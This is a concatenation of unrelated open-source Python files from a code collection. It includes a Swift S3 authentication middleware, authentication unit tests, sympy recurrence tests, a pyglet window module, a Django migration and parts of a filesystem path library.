    with open(os.path.join(out_dir, 'array_run.sh'), 'w') as f:
        for l in strings:
            f.write(l + '\n')
    with open(os.path.join(out_dir, 'run_bsub.sh'), 'w') as f:
        f.write(bsub_run_str + '\n')
    with open(os.path.join(out_dir, 'run_qsub.sh'), 'w') as f:
        f.write(qsub_run_str + '\n')
    with open(os.path.join(out_dir, 'prep.sh'), 'w') as f:
        f.write('chmod +x *.sh\n')
        f.write('mkdir logs\n')
        f.write('mkdir results\n')
def main():
    """Command-line entry point: run one simulation and save its results.

    Positional args: run_id, graph, iterations, epsilon_control,
    epsilon_damage; optional --nodes for the synthetic graph types.
    """
    parser = argparse.ArgumentParser(description='Run model.')
    # Positional arguments (metavar deliberately equals the name).
    for arg_name, arg_type in [('run_id', int),
                               ('graph', str),
                               ('iterations', int),
                               ('epsilon_control', float),
                               ('epsilon_damage', float)]:
        parser.add_argument(arg_name, metavar=arg_name, type=arg_type)
    parser.add_argument('--nodes', metavar='nodes', type=int)
    args = parser.parse_args()

    # 'regular'/'scalefree' use generators; anything else is a GraphML path.
    dispatch = {'regular': compare_cases.run_regular,
                'scalefree': compare_cases.run_scalefree}
    runner = dispatch.get(args.graph, compare_cases.run_on_graph)

    if runner is compare_cases.run_on_graph:
        G = nx.read_graphml(args.graph)
        G = G.to_undirected()  # Force undirected
        result = runner(G=G, iterations=args.iterations,
                        epsilon_control=args.epsilon_control,
                        epsilon_damage=args.epsilon_damage)
    else:
        result = runner(nodes=args.nodes, iterations=args.iterations,
                        epsilon_control=args.epsilon_control,
                        epsilon_damage=args.epsilon_damage)

    uncontrolled, controlled, df, costs = result
    df.to_csv('results/cascades_{:0>4d}.csv'.format(args.run_id))
    with open('results/costs_{:0>4d}.csv'.format(args.run_id), 'w') as f:
        f.write(str(costs[0]) + '\n')
        f.write(str(costs[1]) + '\n')
|
django-blog-zinnia/zinnia-twitter | setup.py | Python | bsd-3-clause | 1,097 | 0 | """Setup script of zinnia-twitter"""
from setuptools import setup
from setuptools import find_packages
import zinnia_twitter
# Package metadata is sourced from the zinnia_twitter package itself so it
# lives in a single place.  (Reconstructed: the 'keywords' value and the
# 'url' keyword were garbled in the previous revision.)
setup(
    name='zinnia-twitter',
    version=zinnia_twitter.__version__,

    description='Twitter plugin for django-blog-zinnia',
    long_description=open('README.rst').read(),
    keywords='django, zinnia, twitter',

    author=zinnia_twitter.__author__,
    author_email=zinnia_twitter.__email__,
    url=zinnia_twitter.__url__,

    packages=find_packages(exclude=['demo_zinnia_twitter']),
    classifiers=[
        'Framework :: Django',
        'Development Status :: 5 - Production/Stable',
        'Environment :: Web Environment',
        'Programming Language :: Python',
        'Programming Language :: Python :: 3',
        'Intended Audience :: Developers',
        'Operating System :: OS Independent',
        'License :: OSI Approved :: BSD License',
        'Topic :: Software Development :: Libraries :: Python Modules'],
    license=zinnia_twitter.__license__,
    include_package_data=True,
    zip_safe=False,
    install_requires=['tweepy']
)
|
cbartz/swift-s3auth | s3auth/middleware.py | Python | apache-2.0 | 16,590 | 0.000121 | # Copyright 2017 Christopher Bartz <bartz@dkrz.de>
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from functools import partial
from hashlib import sha1
import hmac
import json
from traceback import format_exc
from urllib import quote
from swift.common.swob import HTTPBadRequest, HTTPCreated, HTTPForbidden,\
HTTPInternalServerError, HTTPNoContent, HTTPNotFound, HTTPOk,\
HTTPUnauthorized, wsgify
from swift.common.utils import cache_from_env, get_logger, split_path
from swift.common.wsgi import make_pre_authed_request
# Memcache key template: "<reseller_prefix>/s3auth/<access_key>".
MEMCACHE_KEY_FORMAT = '%s/s3auth/%s'
# Account-metadata headers on the hidden .s3auth account holding the HMAC
# hash key and the hashed admin key.
HKEY_HASH_KEY = 'X-Account-Meta-Hash-Key'
HKEY_HASHED_ADMIN_KEY = 'X-Account-Meta-Hashed-Admin-Key'
def _hash_msg(msg, hash_key):
"""Return sha1 hash for given message."""
return hmac.new(hash_key, msg, sha1).hexdigest()
def _denied_response(req):
    """Return a 403 or 401 Response depending on REMOTE_USER."""
    # Authenticated but not allowed -> 403; not authenticated -> 401.
    if not req.remote_user:
        return HTTPUnauthorized(request=req)
    return HTTPForbidden(request=req)
def _require_s3auth_admin(f):
    """ Decorator which checks if user is s3auth admin.

    The wrapped method must take a swob Request as its second positional
    argument (after ``self``).  The request's ``x-s3auth-admin-key`` header
    is HMAC-hashed with the auth account's hash key and compared against
    the stored hashed admin key; on mismatch a 401/403 is returned.
    """
    def inner(*args, **kwargs):
        self = args[0]
        req = args[1]
        key1 = req.headers.get('x-s3auth-admin-key')
        if not key1:
            return HTTPBadRequest(
                body='x-s3auth-admin-key header required',
                request=req)
        # Fetch the stored hash key / hashed admin key from the hidden
        # .s3auth account via a pre-authed HEAD.
        path = quote('/v1/{}'.format(self.auth_account))
        resp = make_pre_authed_request(
            req.environ, 'HEAD', path).get_response(self.app)
        if resp.status_int // 100 != 2:
            raise Exception('Could not HEAD account: {} {}'.format(
                path, resp.status_int))
        hashed_key2 = resp.headers.get(HKEY_HASHED_ADMIN_KEY)
        hash_key = resp.headers[HKEY_HASH_KEY].encode('utf-8')
        if _hash_msg(key1, hash_key) == hashed_key2:
            return f(*args, **kwargs)
        else:
            return _denied_response(req)
    inner.__doc__ = f.__doc__
    # Fixed: this assignment was garbled ("f.__repr_ _") in the previous
    # revision.
    inner.__repr__ = f.__repr__
    return inner
class S3Auth(object):
def __init__(self, app, conf):
self.app = app
self.logger = get_logger(conf, log_route='s3auth')
self.auth_prefix = conf.get('auth_prefix', '/s3auth/')
if not self.auth_prefix:
self.auth_prefix = '/s3auth/'
if self.auth_prefix[0] != '/':
self.auth_prefix = '/' + self.auth_prefix
| if self.auth_prefix[-1] != '/':
self.auth_prefix += '/'
self.reseller_prefix = (conf.get('reseller_prefix', 'AUTH_').
rstrip('_') + '_')
self.auth_account = "{}.s3auth".format(self.reseller_prefix)
self.akd_container_url = '/v1/{}/akeydetails/'.format(
self.auth_account
)
self.prep_key = conf.get('prep_key')
cache_time = conf.get('memcache_time', 60 * 10)
try:
self.cache_time = float(cache_time)
except ValueError:
raise ValueError(
'value %s for memcache_time option must be a float',
cache_time)
    def _authorize(self, req):
        """
        Authorize swift request. Used e.g. by proxy-server.

        Grants owner rights when the authenticated user matches the
        request's account, except for account-level DELETE/PUT.

        :return: None if authorized, otherwise Response
        """
        try:
            version, account, container, obj = split_path(
                req.path, 1, 4, True)
        except ValueError:
            # Malformed path -> no way to authorize it.
            return _denied_response(req)
        if not account or not account.startswith(self.reseller_prefix):
            return _denied_response(req)
        if req.remote_user == account and \
                (req.method not in ('DELETE', 'PUT') or container):
            # If the user is admin for the account and is not trying to do an
            # account DELETE or PUT...
            req.environ['swift_owner'] = True
            return None
        return _denied_response(req)
    @wsgify
    def __call__(self, req):
        """Accept a standard WSGI app call.

        The call takes one of two paths:

        - Handle a request to the auth system (e.g. creating
          new access keys or changing a secret key).
        - Authenticate a request which is signed with a s3 signature,
          as pre-parsed by the swift3 middleware into
          ``swift3.auth_details``.

        Any unexpected exception is logged and turned into a 500.
        """
        try:
            if req.path_info.startswith(self.auth_prefix):
                return self.handle_auth_api(req)
            if 'swift3.auth_details' in req.environ:
                auth_details = req.environ['swift3.auth_details']
                akey = auth_details['access_key']
                secret, account = self._get_details(req, akey)
                if secret:
                    # Authentication.
                    if auth_details['check_signature'](secret.encode('utf-8')):
                        req.environ['swift.authorize_override'] = True
                        # Authorization function (used later in pipeline).
                        req.environ['swift.authorize'] = self._authorize
                        req.remote_user = account
                        # swift3 sets account to access_key . Replace.
                        req.environ['PATH_INFO'] = req.environ['PATH_INFO'].\
                            replace(akey, account, 1)
                    else:
                        return _denied_response(req)
                else:
                    # Unknown access key.
                    return _denied_response(req)
        except Exception:
            self.logger.error(
                'EXCEPTION occured: %s: %s', format_exc(), req.environ)
            return HTTPInternalServerError(request=req)
        return self.app
    def _get_details(self, req, access_key):
        """Get access key details.

        Checks memcache first, then falls back to a pre-authed GET on the
        akeydetails container; successful lookups are cached for
        ``self.cache_time`` seconds.

        :return: (secret_key, account) as tuple or (None, None) if not found.
        """
        memcache_client = cache_from_env(req.environ)
        if memcache_client:
            memcache_key = MEMCACHE_KEY_FORMAT % (
                self.reseller_prefix, access_key)
            data = memcache_client.get(memcache_key)
            if data:
                return data[0], data[1]
        path = quote(self.akd_container_url + access_key)
        resp = make_pre_authed_request(req.environ, 'GET',
                                       path).get_response(self.app)
        if resp.status_int // 100 == 2:
            data = json.loads(resp.body)
            secret_key, account = data['secret_key'], data['account']
            if memcache_client:
                memcache_client.set(memcache_key, (secret_key, account),
                                    time=self.cache_time)
            return secret_key, account
        elif resp.status_int // 100 == 4:
            # The key object simply does not exist.
            return None, None
        else:
            # 5xx and friends: let __call__ turn this into a 500.
            raise Exception('Could not GET access key details: {} {}'.format(
                path, resp.status_int))
def _set_details(self, req, access_key, secret_key, account):
"""Set access key details."""
path = quote(self.akd_container_url + access_key)
resp = make_pre_authed_request(
env=req.environ,
method='PUT',
path=path,
body=json.dumps({'secret_key': secret_key, 'account': account})).\
get_response(self.app)
if resp.status_int // 100 == 2:
# Remove old data from cache.
memcache_client = cache_from_env(req.environ)
if memcache_client:
memcache_key = MEMCACHE_KEY_FORMAT % (self.reseller_prefix,
access_key)
memcache_client.delete(memcache_key)
else:
raise Exception(
'Could not PUT access key details: {} {}'.format(
path, resp.status_int |
certik/sympy-oldcore | sympy/plotting/pyglet/window/__init__.py | Python | bsd-3-clause | 54,133 | 0.00133 | # ----------------------------------------------------------------------------
# pyglet
# Copyright (c) 2006-2007 Alex Holkner
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions
# are met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in
# the documentation and/or other materials provided with the
# distribution.
# * Neither the name of the pyglet nor the names of its
# contributors may be used to endorse or promote products
# derived from this software without specific prior written
# permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS
# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
# COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
# INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,
# BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
# LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN
# ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
# ----------------------------------------------------------------------------
'''Windowing and user-interface events.
This module allows applications to create and display windows with an
OpenGL context. Windows can be created with a variety of border styles
or set fullscreen.
You can register event handlers for keyboard, mouse and window events.
For games and kiosks you can also restrict the input to your windows,
for example disabling users from switching away from the application
with certain key combinations or capturing and hiding the mouse.
Getting started
---------------
Call the Window constructor to create a new window::
from pyglet.window import Window
win = Window(width=640, height=480)
Attach your own event handlers::
@win.event
def on_key_press(symbol, modifiers):
        # ... handle this event ...
Within your main run loop, you must call `Window.dispatch_events` regularly.
Windows are double-buffered by default, so you must call `Window.flip` to
update the display::
while not win.has_exit:
win.dispatch_events()
        # ... drawing commands ...
win.flip()
Creating a game window
----------------------
Use `Window.set_exclusive_mouse` to hide the mouse cursor and receive relative
mouse movement events. Specify ``fullscreen=True`` as a keyword argument to
the `Window` constructor to render to the entire screen rather than opening a
window::
win = Window(fullscreen=True)
win.set_mouse_exclusive()
Working with multiple windows
-----------------------------
You can open any number of windows and render to them individually. Each
window must have the event handlers set on it that you are interested in
(i.e., each window will have its own mouse event handler).
You must call `Window.dispatch_events` for each window. Before rendering
to a window, you must call `Window.switch_to` to set the active GL context.
Here is an example run loop for a list of windows::
windows = # list of Window instances
while windows:
for win in windows:
win.dispatch_events()
if win.has_exit:
win.close()
windows = [w for w in windows if not w.has_exit]
for win in windows:
win.switch_to()
# ... drawing commands for this window ...
win.flip()
Working with multiple screens
-----------------------------
By default, fullscreen windows are opened on the primary display (typically
set by the user in their operating system settings). You can retrieve a list
of attached screens and select one manually if you prefer. This is useful for
opening a fullscreen window on each screen::
display = window.get_platform().get_default_display()
screens = display.get_screens()
windows = []
for screen in screens:
windows.append(window.Window(fullscreen=True, screen=screen))
Specifying a screen has no effect if the window is not fullscreen.
Specifying the OpenGL context properties
----------------------------------------
Each window has its own context which is created when the window is created.
You can specify the properties of the context before it is created
by creating a "template" configuration::
from pyglet import gl
# Create template config
config = gl.Config()
config.stencil_size = 8
config.aux_buffers = 4
# Create a window using this config
win = window.Window(config=config)
To determine if a given configuration is supported, query the screen (see
above, "Working with multiple screens")::
configs = screen.get_matching_configs(config)
if not configs:
# ... config is not supported
else:
win = window.Window(config=configs[0])
'''
__docformat__ = 'restructuredtext'
__version__ = '$Id: __init__.py 1195 2007-08-24 09:38:40Z Alex.Holkner $'
import pprint
import sys
from pyglet import gl
from pyglet.gl import gl_info
from pyglet.event import EventDispatcher
from pyglet.window.event import WindowExitHandler
import pyglet.window.key
# Exception hierarchy: every window-related error derives from
# WindowException, so callers can catch them with a single except clause.
class WindowException(Exception):
    '''The root exception for all window-related errors.'''
    pass

class NoSuchDisplayException(WindowException):
    '''An exception indicating the requested display is not available.'''
    pass

class NoSuchConfigException(WindowException):
    '''An exception indicating the requested configuration is not
    available.'''
    pass

class MouseCursorException(WindowException):
    '''The root exception for all mouse cursor-related errors.'''
    pass
class Platform(object):
    '''Operating-system-level functionality.
    The platform instance can only be obtained with `get_platform`. Use
    the platform to obtain a `Display` instance.
    '''
    def get_display(self, name):
        '''Get a display device by name.
        This is meaningful only under X11, where the `name` is a
        string including the host name and display number; for example
        ``"localhost:1"``.
        On platforms other than X11, `name` is ignored and the default
        display is returned. pyglet does not support multiple
        video devices on Windows or OS X. If more than one device is
        attached, they will appear as a single virtual device comprising
        all the attached screens.
        :Parameters:
            `name` : str
                The name of the display to connect to.
        :rtype: `Display`
        '''
        # NOTE(review): this calls the module-level get_default_display(),
        # which is not defined in the visible part of this file -- confirm
        # it exists (or whether self.get_default_display() was intended).
        return get_default_display()

    def get_default_display(self):
        '''Get the default display device.
        :rtype: `Display`
        '''
        raise NotImplementedError('abstract')
class Display(object):
'''A display device supporting one or more screens.
Use `Platform.get_display` or `Platform.get_default_display` to obtain
an instance of this class. Use a display to obtain `Screen` instances.
'''
    def __init__(self):
        # Presumably tracks windows opened on this display; the usage is
        # not visible in this part of the file -- TODO confirm.
        self._windows = []

    def get_screens(self):
        '''Get the available screens.
        A typical multi-monitor workstation comprises one `Display` with
        multiple `Screen` s. This method returns a list of screens which
        can be enumerated to select one for full-screen display.
        For the purposes of creating an OpenGL config, the default screen
        will suffice.
        :rtype: list of `Screen`
        '''
        raise NotImplementedError('abstract')
def get_default_screen(self):
'''Get the default screen as specified by the user's operating system
preferences.
|
ValyrianTech/BitcoinSpellbook-v0.3 | unittests/test_authentication.py | Python | gpl-3.0 | 3,052 | 0.00557 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
import pytest
import mock
import authentication
NONCE = 1
class TestAuthentication(object):
    """Tests for ``authentication.check_authentication``.

    ``setup`` runs before each test: it stubs the on-disk API-key store
    (key ``foo`` -> secret ``bar1``), bumps the module-level NONCE (nonces
    must strictly increase between requests) and builds valid headers for
    the request ``data``.
    """
    headers = None
    data = None

    def setup(self):
        global NONCE
        # Stub the key store so no file access happens.
        authentication.load_from_json_file = mock.MagicMock(
            return_value={'foo': {'secret': 'bar1'}})
        self.data = {'test': 'test'}
        # Each test needs a fresh, strictly increasing nonce.
        NONCE = NONCE + 1
        # Fixed: the 'API_Sign' key and the first test's name below were
        # garbled in the previous revision.
        self.headers = {'API_Key': 'foo',
                        'API_Sign': authentication.signature(self.data, NONCE, 'bar1'),
                        'API_Nonce': NONCE}

    def test_check_authentication_with_valid_headers_and_data(self):
        assert authentication.check_authentication(self.headers, self.data) == authentication.AuthenticationStatus.OK

    def test_check_authentication_with_valid_headers_and_data_but_the_same_nonce(self):
        # Re-sign with the previous nonce: replays must be rejected.
        self.headers['API_Sign'] = authentication.signature(self.data, NONCE-1, 'bar1')
        self.headers['API_Nonce'] = NONCE - 1
        assert authentication.check_authentication(self.headers, self.data) == authentication.AuthenticationStatus.INVALID_NONCE

    def test_check_authentication_with_valid_headers_and_data_and_a_nonce_that_is_higher_than_the_previous_request(self):
        assert authentication.check_authentication(self.headers, self.data) == authentication.AuthenticationStatus.OK

    def test_check_authentication_without_api_key_header(self):
        del self.headers['API_Key']
        assert authentication.check_authentication(self.headers, self.data) == authentication.AuthenticationStatus.NO_API_KEY

    def test_check_authentication_without_api_sign_header(self):
        del self.headers['API_Sign']
        assert authentication.check_authentication(self.headers, self.data) == authentication.AuthenticationStatus.NO_SIGNATURE

    def test_check_authentication_without_api_nonce_header(self):
        del self.headers['API_Nonce']
        assert authentication.check_authentication(self.headers, self.data) == authentication.AuthenticationStatus.NO_NONCE

    def test_check_authentication_with_wrong_secret(self):
        self.headers['API_Sign'] = authentication.signature(self.data, NONCE, 'ABCD')
        assert authentication.check_authentication(self.headers, self.data) == authentication.AuthenticationStatus.INVALID_SIGNATURE

    def test_check_authentication_with_api_key(self):
        # Unknown API key.
        self.headers['API_Key'] = 'bar'
        assert authentication.check_authentication(self.headers, self.data) == authentication.AuthenticationStatus.INVALID_API_KEY

    def test_check_authentication_with_changed_data(self):
        # Signature was computed over different data -> must not verify.
        self.data = {'something': 'else'}
        assert authentication.check_authentication(self.headers, self.data) == authentication.AuthenticationStatus.INVALID_SIGNATURE

    def test_signature_with_secret_that_is_not_a_multiple_of_4_characters(self):
        with pytest.raises(Exception) as ex:
            authentication.signature(self.data, NONCE, 'a')
        assert 'The secret must be a string with a length of a multiple of 4!' in str(ex.value)
|
unicef/un-partner-portal | backend/unpp_api/apps/partner/migrations/0005_partner_country_presents.py | Python | apache-2.0 | 733 | 0.001364 | # -*- coding: utf-8 -*-
# Generated by Django 1.11.3 on 2017-08-28 07:07
from __future__ import unicode_literals
import django.contrib.postgres.fields
from django.db import migrations, models
class Migration(migrations.Migration):
    """Add the ``country_presents`` ArrayField to the ``partner`` model.

    (Reconstructed: the ``model_name`` and ``name`` arguments were garbled
    in the previous revision.)
    """

    dependencies = [
        ('partner', '0004_auto_20170814_0841'),
    ]

    operations = [
        migrations.AddField(
            model_name='partner',
            name='country_presents',
            # NOTE(review): the choice values ('Ara', 'Chi', ...) are three
            # characters long but max_length is 2 -- verify against the
            # current model definition.
            field=django.contrib.postgres.fields.ArrayField(base_field=models.CharField(choices=[('Ara', 'Arabic'), ('Chi', 'Chinese'), ('Eng', 'English'), ('Fre', 'French'), ('Rus', 'Russian'), ('Spa', 'Spanish'), ('Oth', 'Other')], max_length=2), default=list, null=True, size=None),
        ),
    ]
|
DmitrySPetrov/simulation_g11 | l06/12.py | Python | mit | 1,229 | 0.007833 | # Задача №1:
# Build an array of N elements of the form [1, 2, 3, 4, ... N]
#
# Solution variant #2: expanding range() into a list
#
# =!!= Run with Python 3 =!!=

# Number of elements.  (Reconstructed: this assignment was garbled in the
# previous revision.)
N = 10

# Build the array.
A = [*range(1, N + 1)]

# Print A.
print(A)

# Notes:
# 1) range(1, N + 1) produces the sequence 1, 2, 3, ... N
# 2) from the language's point of view, range(...) creates a lazy object
#    that only yields its values when iterated, which is why the * operator
#    is placed in front of it here
# 3) the * operator means "unpack this object into the surrounding
#    sequence"; e.g. *[1, 2, 3] expands to the elements 1, 2, 3, and
#    range(1, N + 1) is expanded into the list the same way
|
GbalsaC/bitnamiP | venv/lib/python2.7/site-packages/sympy/solvers/tests/test_recurr.py | Python | agpl-3.0 | 3,721 | 0.013169 | from sympy import Function, symbols, S, sqrt, rf, factorial
from sympy.solvers.recurr import rsolve, rsolve_poly, rsolve_ratio, rsolve_hyper
# Shared fixtures: the unknown sequence y(n), integer symbols n and k, and
# the integration constants C0..C2 that appear in rsolve_* answers.
y = Function('y')
n, k = symbols('n,k', integer=True)
C0, C1, C2 = symbols('C0,C1,C2')
def test_rsolve_poly():
    """rsolve_poly: polynomial solutions of linear recurrences."""
    assert rsolve_poly([-1, -1, 1], 0, n) == 0
    assert rsolve_poly([-1, -1, 1], 1, n) == -1
    assert rsolve_poly([-1, n+1], n, n) == 1
    assert rsolve_poly([-1, 1], n, n) == C0 + (n**2 - n)/2
    assert rsolve_poly([-n-1, n], 1, n) == C1*n - 1
    assert rsolve_poly([-4*n-2, 1], 4*n+1, n) == -1
    assert rsolve_poly([-1, 1], n**5 + n**3, n) == C0 - n**3 / 2 - n**5 / 2 + n**2 / 6 + n**6 / 6 + 2*n**4 / 3
def test_rsolve_ratio():
    """rsolve_ratio: rational solutions; the answer may come back in any of
    several equivalent forms, hence the ``in`` check.

    (Reconstructed: one of the candidate expressions was garbled in the
    previous revision.)
    """
    solution = rsolve_ratio([-2*n**3+n**2+2*n-1, 2*n**3+n**2-6*n,
        -2*n**3-11*n**2-18*n-9, 2*n**3+13*n**2+22*n+8], 0, n)
    assert solution in [
        C1*((-2*n + 3)/(n**2 - 1))/3,
        (S(1)/2)*(C1*(-3 + 2*n)/(-1 + n**2)),
        (S(1)/2)*(C1*( 3 - 2*n)/( 1 - n**2)),
        (S(1)/2)*(C2*(-3 + 2*n)/(-1 + n**2)),
        (S(1)/2)*(C2*( 3 - 2*n)/( 1 - n**2)),
    ]
def test_rsolve_hyper():
    """rsolve_hyper: hypergeometric solutions; constants may be assigned in
    either order, hence the ``in`` checks.

    (Reconstructed: the second assertion's ``in`` was garbled in the
    previous revision.)
    """
    assert rsolve_hyper([-1, -1, 1], 0, n) in [
        C0*(S.Half - S.Half*sqrt(5))**n + C1*(S.Half + S.Half*sqrt(5))**n,
        C1*(S.Half - S.Half*sqrt(5))**n + C0*(S.Half + S.Half*sqrt(5))**n,
    ]
    assert rsolve_hyper([n**2-2, -2*n-1, 1], 0, n) in [
        C0*rf(sqrt(2), n) + C1*rf(-sqrt(2), n),
        C1*rf(sqrt(2), n) + C0*rf(-sqrt(2), n),
    ]
    assert rsolve_hyper([n**2-k, -2*n-1, 1], 0, n) in [
        C0*rf(sqrt(k), n) + C1*rf(-sqrt(k), n),
        C1*rf(sqrt(k), n) + C0*rf(-sqrt(k), n),
    ]
    assert rsolve_hyper([2*n*(n+1), -n**2-3*n+2, n-1], 0, n) == C0*factorial(n) + C1*2**n
    assert rsolve_hyper([n + 2, -(2*n + 3)*(17*n**2 + 51*n + 39), n + 1], 0, n) == 0
    assert rsolve_hyper([-n-1, -1, 1], 0, n) == 0
    assert rsolve_hyper([-1, 1], n, n).expand() == C0 + n**2/2 - n/2
    assert rsolve_hyper([-1, 1], 1+n, n).expand() == C0 + n**2/2 + n/2
    assert rsolve_hyper([-1, 1], 3*(n+n**2), n).expand() == C0 + n**3 - n
def recurrence_term(c, f):
    """Compute RHS of recurrence in f(n) with coefficients in c."""
    # Note: closes over the module-level symbol ``n``.
    return sum(c[i]*f.subs(n, n+i) for i in range(len(c)))
def rsolve_bulk_checker(solver, c, q, p):
    """Used by test_rsolve_bulk: assert that *solver* recovers *p* from the
    recurrence with coefficients *c* and right-hand side *q*."""
    pp = solver(c, q, n)
    assert pp == p
def test_rsolve_bulk():
    """Some bulk-generated tests."""
    # Nose-style generator test: each yielded tuple is run as one test case.
    funcs = [ n, n+1, n**2, n**3, n**4, n+n**2, 27*n + 52*n**2 - 3*n**3 + 12*n**4 - 52*n**5 ]
    coeffs = [ [-2, 1], [-2, -1, 1], [-1, 1, 1, -1, 1], [-n, 1], [n**2-n+12, 1] ]
    for p in funcs:
        # compute difference
        for c in coeffs:
            q = recurrence_term(c, p)
            if p.is_polynomial(n):
                yield rsolve_bulk_checker, rsolve_poly, c, q, p
            #if p.is_hypergeometric(n):
            #    yield rsolve_bulk_checker, rsolve_hyper, c, q, p
def test_rsolve():
    """End-to-end rsolve tests: a Fibonacci-type recurrence and a
    factorial/2**n recurrence, with and without initial conditions."""
    f = y(n+2) - y(n+1) - y(n)
    h = sqrt(5)*(S.Half + S.Half*sqrt(5))**n \
        - sqrt(5)*(S.Half - S.Half*sqrt(5))**n
    assert rsolve(f, y(n)) in [
        C0*(S.Half - S.Half*sqrt(5))**n + C1*(S.Half + S.Half*sqrt(5))**n,
        C1*(S.Half - S.Half*sqrt(5))**n + C0*(S.Half + S.Half*sqrt(5))**n,
    ]
    # Initial conditions may be given positionally, by index, or as y(i).
    assert rsolve(f, y(n), [ 0, 5 ]) == h
    assert rsolve(f, y(n), { 0 :0, 1 :5 }) == h
    assert rsolve(f, y(n), { y(0):0, y(1):5 }) == h
    f = (n-1)*y(n+2) - (n**2+3*n-2)*y(n+1) + 2*n*(n+1)*y(n)
    g = C0*factorial(n) + C1*2**n
    h = -3*factorial(n) + 3*2**n
    assert rsolve(f, y(n)) == g
    assert rsolve(f, y(n), [ 0, 3 ]) == h
    assert rsolve(f, y(n), { 0 :0, 1 :3 }) == h
    assert rsolve(f, y(n), { y(0):0, y(1):3 }) == h
|
TheTimmy/spack | lib/spack/external/py/_path/local.py | Python | lgpl-2.1 | 32,583 | 0.001442 | """
local path implementation.
"""
from __future__ import with_statement
from contextlib import contextmanager
import sys, os, re, atexit, io
import py
from py._path import common
from py._path.common import iswin32, fspath
from stat import S_ISLNK, S_ISDIR, S_ISREG
from os.path import abspath, normpath, isabs, exists, isdir, isfile, islink, dirname
# Py2/py3 shim: on Python 3 ``map`` is lazy, so wrap it in ``list`` to keep
# the eager-list semantics that Python 2 callers expect.
if sys.version_info > (3,0):
    def map_as_list(func, iter):
        return list(map(func, iter))
else:
    map_as_list = map
class Stat(object):
    """Wrapper around an os.stat result for a given path.

    Unknown attribute access is delegated to the underlying stat result
    with the ``st_`` prefix added (e.g. ``stat.size`` -> ``st_size``).
    """
    def __getattr__(self, name):
        return getattr(self._osstatresult, "st_" + name)

    def __init__(self, path, osstatresult):
        self.path = path
        self._osstatresult = osstatresult

    @property
    def owner(self):
        """Return the owner name of the file (posix only)."""
        if iswin32:
            raise NotImplementedError("XXX win32")
        import pwd
        entry = py.error.checked_call(pwd.getpwuid, self.uid)
        return entry[0]

    @property
    def group(self):
        """ return group name of file. """
        if iswin32:
            raise NotImplementedError("XXX win32")
        import grp
        entry = py.error.checked_call(grp.getgrgid, self.gid)
        return entry[0]

    def isdir(self):
        return S_ISDIR(self._osstatresult.st_mode)

    def isfile(self):
        return S_ISREG(self._osstatresult.st_mode)

    def islink(self):
        # NOTE(review): the lstat() result below is computed but unused;
        # the check runs against the stored stat result, so a Stat built
        # from path.stat() (which follows links) reports False here.
        # Confirm whether ``S_ISLNK(st.mode)`` was intended.
        st = self.path.lstat()
        return S_ISLNK(self._osstatresult.st_mode)
class PosixPath(common.PathBase):
    """Mixin providing POSIX-only path operations (ownership and links)."""
    def chown(self, user, group, rec=0):
        """ change ownership to the given user and group.
        user and group may be specified by a number or
        by a name. if rec is True change ownership
        recursively.
        """
        uid = getuserid(user)
        gid = getgroupid(group)
        if rec:
            # Chown the children first; symlinks are skipped so we do not
            # follow them outside the tree.
            for x in self.visit(rec=lambda x: x.check(link=0)):
                if x.check(link=0):
                    py.error.checked_call(os.chown, str(x), uid, gid)
        py.error.checked_call(os.chown, str(self), uid, gid)

    def readlink(self):
        """ return value of a symbolic link. """
        return py.error.checked_call(os.readlink, self.strpath)

    def mklinkto(self, oldname):
        """ posix style hard link to another name. """
        py.error.checked_call(os.link, str(oldname), str(self))

    def mksymlinkto(self, value, absolute=1):
        """ create a symbolic link with the given value (pointing to another name). """
        if absolute:
            py.error.checked_call(os.symlink, str(value), self.strpath)
        else:
            base = self.common(value)
            # with posix local paths '/' is always a common base
            relsource = self.__class__(value).relto(base)
            reldest = self.relto(base)
            n = reldest.count(self.sep)
            # Climb out of reldest's directories, then descend to relsource.
            target = self.sep.join(('..', )*n + (relsource, ))
            py.error.checked_call(os.symlink, target, self.strpath)
def getuserid(user):
    """Resolve *user* (a name or a numeric uid) to a numeric uid."""
    import pwd
    if isinstance(user, int):
        return user
    return pwd.getpwnam(user)[2]
def getgroupid(group):
    """Resolve *group* (a name or a numeric gid) to a numeric gid."""
    import grp
    if isinstance(group, int):
        return group
    return grp.getgrnam(group)[2]
# On POSIX, local paths gain the chown/symlink helpers from PosixPath;
# on win32 they fall back to the plain common.PathBase.
FSBase = not iswin32 and PosixPath or common.PathBase
class LocalPath(FSBase):
""" object oriented interface to os.path and other local filesystem
related information.
"""
class ImportMismatchError(ImportError):
""" raised on pyimport() if there is a mismatch of __file__'s"""
sep = os.sep
class Checkers(common.Checkers):
def _stat(self):
try:
return self._statcache
except AttributeError:
try:
self._statcache = self.path.stat()
except py. | error.ELOOP:
self._statcache = self.path.lstat()
return self._statcache
def dir(self):
return S_ISDIR(self._stat().mode)
def file(self):
return S_ISREG(self._stat().mode)
def exists(self):
return self._stat()
